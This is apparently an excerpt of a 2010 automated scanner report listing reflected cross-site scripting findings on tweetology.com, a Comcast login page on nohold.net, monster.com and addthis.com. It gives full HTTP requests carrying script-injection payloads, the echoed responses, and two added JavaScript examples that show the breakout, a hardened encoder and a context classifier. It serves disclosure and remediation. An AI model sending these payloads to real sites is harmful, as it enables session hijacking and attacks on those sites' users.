X-Server-Name: c.web.ec2.tweetedia.com
Content-Length: 5479
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <link rel="stylesheet" href="/facebox/facebox.css" type="text/css" media="screen" />
<link r
...[SNIP]...
<!--
   Invalid controller specified (images49d2a--><a>25b0fc71d41)
   #0 /var/www/tweetedia.com/live/library/Zend/Controller/Front.php(954): Zend_Controller_Dispatcher_Standard->
...[SNIP]...

2.606. http://www.tweetology.com/images/button-login.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.tweetology.com
Path:   /images/button-login.png

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cec8d"><a>f100367979f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /images/button-login.pngcec8d"><a>f100367979f HTTP/1.1
Host: www.tweetology.com
Proxy-Connection: keep-alive
Referer: http://www.csnchicago.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=87942173.1292520063.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=4dc3f7d-12cf0330131-4050c3a0-1; __utma=87942173.1105891112.1292520063.1292520063.1292520063.1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html
Date: Sun, 19 Dec 2010 18:37:39 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache
Set-Cookie: PHPSESSID=j5ijvi3m1o9pblov1h7g48drd5; path=/
X-Powered-By: PHP/5.2.11
X-Server-Name: d.web.ec2.tweetedia.com
Content-Length: 5478
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <link rel="stylesheet" href="/facebox/facebox.css" type="text/css" media="screen" />
<link r
...[SNIP]...
<div class="button-login.pngcec8d"><a>f100367979f">
...[SNIP]...

2.607. http://www.tweetology.com/images/widget/scrollbar-top-e8e8e8.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.tweetology.com
Path:   /images/widget/scrollbar-top-e8e8e8.png

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 91c44--><a>8f884a365c5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images91c44--><a>8f884a365c5/widget/scrollbar-top-e8e8e8.png HTTP/1.1
Host: www.tweetology.com
Proxy-Connection: keep-alive
Referer: http://www.csnchicago.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=87942173.1292520063.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=4dc3f7d-12cf0330131-4050c3a0-1; __utma=87942173.1105891112.1292520063.1292520063.1292520063.1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html
Date: Sun, 19 Dec 2010 18:37:29 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache
Set-Cookie: PHPSESSID=dca898dd0gpk6uad4loij6g6i1; path=/
X-Powered-By: PHP/5.2.11
X-Server-Name: c.web.ec2.tweetedia.com
Content-Length: 5469
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <link rel="stylesheet" href="/facebox/facebox.css" type="text/css" media="screen" />
<link r
...[SNIP]...
<!--
   Invalid controller specified (images91c44--><a>8f884a365c5)
   #0 /var/www/tweetedia.com/live/library/Zend/Controller/Front.php(954): Zend_Controller_Dispatcher_Standard->
...[SNIP]...

2.608. http://www.tweetology.com/images/widget/scrollbar-top-e8e8e8.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.tweetology.com
Path:   /images/widget/scrollbar-top-e8e8e8.png

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd508"><a>4cb76147745 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /images/widgetcd508"><a>4cb76147745/scrollbar-top-e8e8e8.png HTTP/1.1
Host: www.tweetology.com
Proxy-Connection: keep-alive
Referer: http://www.csnchicago.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=87942173.1292520063.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=4dc3f7d-12cf0330131-4050c3a0-1; __utma=87942173.1105891112.1292520063.1292520063.1292520063.1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html
Date: Sun, 19 Dec 2010 18:37:33 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache
Set-Cookie: PHPSESSID=prq8u6tbe98orsinlpcgktalc1; path=/
X-Powered-By: PHP/5.2.11
X-Server-Name: d.web.ec2.tweetedia.com
Content-Length: 5468
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <link rel="stylesheet" href="/facebox/facebox.css" type="text/css" media="screen" />
<link r
...[SNIP]...
<div class="widgetcd508"><a>4cb76147745">
...[SNIP]...

2.609. http://www5.nohold.net/Comcast/Loginr.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www5.nohold.net
Path:   /Comcast/Loginr.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa66d"><script>alert(1)</script>e6c54017b8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/Loginr.aspx?aa66d"><script>alert(1)</script>e6c54017b8e=1 HTTP/1.1
Host: www5.nohold.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: k3kf32=; k3usertext2=; k3alt22=; k3displaycondition2=; k3alt32=; k3kf22=; k3rid2=75153882936399747; k3userrole2=; k3estate2=; k3eroute2=; ARPT=VXXYKQS192.168.1.164CKOKQ; k3app2=; k3alt12=; k3domain2=; k3mid2=; k3alt62=; k3lang2=; k3alt52=; k3alt42=; k3kf12=; ASP.NET_SessionId=4food245gnycm2ff2jd4y3ul; k3login2=;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:13:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Pragma: no-cache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 1017


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>AskComcast</ti
...[SNIP]...
<iframe src="ukp.aspx?aa66d"><script>alert(1)</script>e6c54017b8e=1&donelr=1" frameborder="0">
...[SNIP]...

2.610. http://www5.nohold.net/Comcast/login.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www5.nohold.net
Path:   /Comcast/login.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 715a9"%3balert(1)//8a78649958d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 715a9";alert(1)//8a78649958d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Comcast/login.aspx?715a9"%3balert(1)//8a78649958d=1 HTTP/1.1
Host: www5.nohold.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: k3kf32=; k3usertext2=; k3alt22=; k3displaycondition2=; k3alt32=; k3kf22=; k3rid2=75153882936399747; k3userrole2=; k3estate2=; k3eroute2=; ARPT=VXXYKQS192.168.1.164CKOKQ; k3app2=; k3alt12=; k3domain2=; k3mid2=; k3alt62=; k3lang2=; k3alt52=; k3alt42=; k3kf12=; ASP.NET_SessionId=4food245gnycm2ff2jd4y3ul; k3login2=;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:13:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Pragma: no-cache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 1132


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Login Pa
...[SNIP]...
=(document.cookie.indexOf("testcookie")!=-1)? true : false
}
//if cookies are enabled on client's browser
if (cookieEnabled)
window.location.href = "Loginr.aspx?715a9";alert(1)//8a78649958d=1";
else
window.location.href = "Shared/nh_noCookie.htm";
//-->
...[SNIP]...

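The breakout in 2.610 and the encoder the remediation calls for, as an added example that is not code from the XSS.CX report or from the nohold.net application. It rebuilds the vulnerable line from the quoted response, builds the hardened equivalent, and uses a parse-only check to show that the hardened value stays inside its string literal. The function names and the reuse of the "Loginr.aspx" template are this example's own assumptions.

```javascript
// Added example, not code from the XSS.CX report or from the nohold.net
// application. Reproduces the string-literal breakout shown in 2.610 and the
// fix a server should apply. Function names and the "Loginr.aspx" template
// are assumptions taken from the quoted response.

// Payload from the report, submitted as a parameter NAME in the query string.
const PAYLOAD = '715a9";alert(1)//8a78649958d';
const QUERY = PAYLOAD + '=1';

// Vulnerable: the raw query string is concatenated into a double-quoted
// JavaScript string literal, exactly as in the login.aspx response.
function buildRedirectVulnerable(query) {
  return 'window.location.href = "Loginr.aspx?' + query + '";';
}

// Hardened: serialise the value as a JavaScript string literal.
// JSON.stringify escapes ", \ and control characters; the extra replacements
// close the gaps that matter inside an inline <script> block ("</script>"
// can no longer be formed) and in older engines that reject raw U+2028/U+2029
// inside string literals.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

function buildRedirectHardened(query) {
  return 'window.location.href = ' + jsStringLiteral('Loginr.aspx?' + query) + ';';
}

// Check: does the right-hand side of the assignment parse as ONE expression?
// A breakout leaves a stray ';' and a second statement, which becomes a syntax
// error once the right-hand side is wrapped in parentheses. new Function only
// parses the text; the injected alert(1) is never executed.
function rhsIsSingleExpression(statement) {
  const rhs = statement.replace(/^window\.location\.href = /, '').replace(/;$/, '');
  try {
    new Function('return (' + rhs + ');');
    return true;
  } catch (e) {
    if (e instanceof SyntaxError) return false;
    throw e;
  }
}

// Round trip: evaluating the hardened literal must give back the exact input.
function roundTrip(value) {
  return new Function('return ' + jsStringLiteral(value) + ';')();
}

console.log(buildRedirectVulnerable(QUERY), '->', rhsIsSingleExpression(buildRedirectVulnerable(QUERY)));
console.log(buildRedirectHardened(QUERY), '->', rhsIsSingleExpression(buildRedirectHardened(QUERY)));
```

The first line printed is byte-for-byte the reflection quoted in the response above and fails the single-expression check; the hardened line keeps the same payload as data and passes it. JSON.stringify alone is not enough for inline script, which is why the angle-bracket and line-terminator escapes are added.
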
2.611. http://jobsearch.comcast.monster.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://jobsearch.comcast.monster.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d77dd'-alert(1)-'6b08e5b8f08 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response. Note that the reflection quoted below sits inside the double-quoted src attribute of an <img> tag, with the rest of the Referer URL-encoded; a single-quote payload cannot terminate that attribute, so the JavaScript-string classification should be confirmed by locating the script reflection in the full response before this entry is treated as exploitable.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability. In practice the Referer is the URL of the page the victim navigated from, so a link on an attacker-controlled page is the usual carrier; whether the payload characters arrive intact depends on how the browser serialises that URL (browsers following the WHATWG URL Standard percent-encode the double quote and the angle brackets in the Referer they send), so confirm delivery in the target browsers before relying on it.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: jobsearch.comcast.monster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d77dd'-alert(1)-'6b08e5b8f08

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:06 GMT
Server: Microsoft-IIS/6.0
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=hhjcrn55rrwzs455qnz3mz3n; path=/; HttpOnly
Set-Cookie: uslc=1; domain=.monster.com; expires=Sun, 26-Dec-2010 18:08:06 GMT; path=/
Set-Cookie: webtrends_Profile=true; path=/
Set-Cookie: TC_Top=; expires=Fri, 19-Nov-2010 18:08:06 GMT; path=/
Set-Cookie: TC_Bottom=; expires=Fri, 19-Nov-2010 18:08:06 GMT; path=/
Set-Cookie: rComms=11-8-13-14-2-1-12-4-7-3-10-9-5-6-15-16-17-18; domain=.monster.com; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 111461
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head id="ctl00_ct
...[SNIP]...
<img height="1" width="1" src="http://switch.atdmt.com/action/deumns_mymonsterlogin_1/v3/http%3a%2f%2fwww.google.com%2fsearch%3fhl%3den%26q%3dd77dd'-alert(1)-'6b08e5b8f08/{1}" alt="" />
...[SNIP]...

2.612. http://www.addthis.com/bookmark.php [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26905"><script>alert(1)</script>b22d59dfac3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability. For this entry the payload depends on a double quote and angle brackets, which browsers following the WHATWG URL Standard percent-encode when they serialise the linking page's URL into the Referer, so a plain attacker-hosted link is unlikely to deliver it unmodified in such browsers; confirm in the target browsers.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=26905"><script>alert(1)</script>b22d59dfac3

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:30:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 92208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<input type="hidden" id="url" name="url" value="http://www.google.com/search?hl=en&q=26905"><script>alert(1)</script>b22d59dfac3" />
...[SNIP]...

2.613. http://www.addthis.com/bookmark.php [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 99be8<script>alert(1)</script>fd1c2d4b6a0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=99be8<script>alert(1)</script>fd1c2d4b6a0

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:30:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 92194

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<h4>99be8<script>alert(1)</script>fd1c2d4b6a0 - Google search</h4>
...[SNIP]...

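The context classification behind the wording of entries 2.610 to 2.613 ("copied into a JavaScript string encapsulated in double quotation marks", "copied into the value of an HTML tag attribute", "copied ... as plain text between tags"), as an added example that is not code from the XSS.CX report. It is a minimal classifier run over sample input constructed from the response excerpts quoted in those four entries; the <script> wrapper around the 2.610 excerpt is assumed, since the report snips it, and the function names and context labels are this example's own.

```javascript
// Added example, not code from the XSS.CX report. A minimal reflection-context
// classifier of the kind a scanner applies before wording a finding as "copied
// into a JavaScript string encapsulated in double quotation marks", "copied into
// the value of an HTML tag attribute" or "copied ... as plain text between tags".
// Function names and context labels are this example's own.

// Sample input constructed from the response excerpts quoted in 2.610 to 2.613.
// The <script> wrapper around the 2.610 excerpt is assumed; the report snips it.
const SAMPLES = {
  '2.610': {
    marker: '715a9";alert(1)//8a78649958d',
    body: `<script type="text/javascript"><!--
if (cookieEnabled)
window.location.href = "Loginr.aspx?715a9";alert(1)//8a78649958d=1";
else
window.location.href = "Shared/nh_noCookie.htm";
//--></script>`,
  },
  '2.611': {
    marker: "d77dd'-alert(1)-'6b08e5b8f08",
    body: `<img height="1" width="1" src="http://switch.atdmt.com/action/deumns_mymonsterlogin_1/v3/http%3a%2f%2fwww.google.com%2fsearch%3fhl%3den%26q%3dd77dd'-alert(1)-'6b08e5b8f08/{1}" alt="" />`,
  },
  '2.612': {
    marker: '26905"><script>alert(1)</script>b22d59dfac3',
    body: `<input type="hidden" id="url" name="url" value="http://www.google.com/search?hl=en&q=26905"><script>alert(1)</script>b22d59dfac3" />`,
  },
  '2.613': {
    marker: '99be8<script>alert(1)</script>fd1c2d4b6a0',
    body: `<h4>99be8<script>alert(1)</script>fd1c2d4b6a0 - Google search</h4>`,
  },
};

// Which quote (if any) is still open at the end of a run of JavaScript source?
// Backslash escapes are honoured so an escaped quote does not count as a close.
function openQuote(js) {
  let quote = null;
  for (let i = 0; i < js.length; i++) {
    const c = js[i];
    if (quote) {
      if (c === '\\') i++;
      else if (c === quote) quote = null;
    } else if (c === '"' || c === "'") {
      quote = c;
    }
  }
  return quote;
}

// Given the context and its delimiter, can the marker's own characters leave it?
function breaksOut(context, quote, marker) {
  switch (context) {
    case 'js-string':
    case 'attribute-value': return marker.includes(quote);
    case 'text':            return marker.includes('<');
    case 'js-code':
    case 'tag':             return true;
    default:                return false;
  }
}

function classifyReflection(body, marker) {
  const pos = body.indexOf(marker);
  if (pos < 0) return { context: 'not-reflected', quote: null, breaksOut: false };
  const before = body.slice(0, pos);
  const lower = before.toLowerCase();
  let context;
  let quote = null;
  if (lower.lastIndexOf('<script') > lower.lastIndexOf('</script')) {
    // Inside a script block: examine the current line up to the marker.
    quote = openQuote(before.slice(before.lastIndexOf('\n') + 1));
    context = quote ? 'js-string' : 'js-code';
  } else if (before.lastIndexOf('<') > before.lastIndexOf('>')) {
    // Inside a tag: is the marker within a quoted attribute value?
    const tag = before.slice(before.lastIndexOf('<'));
    const m = tag.match(/=\s*(["'])(?:(?!\1)[\s\S])*$/);
    quote = m ? m[1] : null;
    context = quote ? 'attribute-value' : 'tag';
  } else {
    context = 'text';
  }
  return { context, quote, breaksOut: breaksOut(context, quote, marker) };
}

function classifyAll(samples) {
  const out = {};
  for (const id of Object.keys(samples)) {
    out[id] = classifyReflection(samples[id].body, samples[id].marker);
  }
  return out;
}

console.log(classifyAll(SAMPLES));
```

Run stand-alone, 2.610, 2.612 and 2.613 come out as breakouts in a double-quoted script string, a double-quoted attribute value and body text respectively, matching the report. 2.611 comes out as a double-quoted attribute value that the single-quote payload cannot close, which is the check to make before accepting the report's JavaScript-string classification for that entry.
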